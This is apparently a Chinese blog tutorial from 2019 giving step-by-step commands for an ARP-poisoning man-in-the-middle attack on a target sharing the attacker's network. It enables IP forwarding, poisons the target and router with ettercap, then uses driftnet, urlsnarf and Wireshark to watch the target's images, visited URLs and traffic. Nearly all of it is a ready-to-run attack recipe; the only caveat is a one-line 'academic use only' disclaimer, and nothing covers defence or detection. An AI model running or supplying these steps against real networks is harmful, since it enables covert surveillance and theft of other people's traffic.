0x01前提

攻击者与目标要位于同一路由网络下

使用工具:kali linux(ettercap+wireshark+dsniff)

(本教程仅用于学术交流)

0x02过程

终端输入echo 1 > /proc/sys/net/ipv4/ip_forward开启转发保证目标能正常上网

一。开启嗅探

终端输入ettercap -G打开ettercap界面,选择Sniff –> Unified sniffing –> 选择你对应的网卡 –> Hosts –> Scan for hosts –> Hosts list –> 将目标ip添加到Target 1,将路由器ip添加到Target 2 –> Mitm –> APR poisoning –> Sniff remote connections –> Start –> Start sniffing

二。监听数据

终端输入driftnet -i eth0(我嗅探使用的网卡是eth0,具体情况具体填写),弹出一个窗口会显示目标正在浏览的图片。

终端输入urlsnarf -i eth0 监听目标浏览过的网页日志。

打开wireshark进行抓包。

Last modification:October 23, 2019
如果觉得我的文章对你有用,请随意赞赏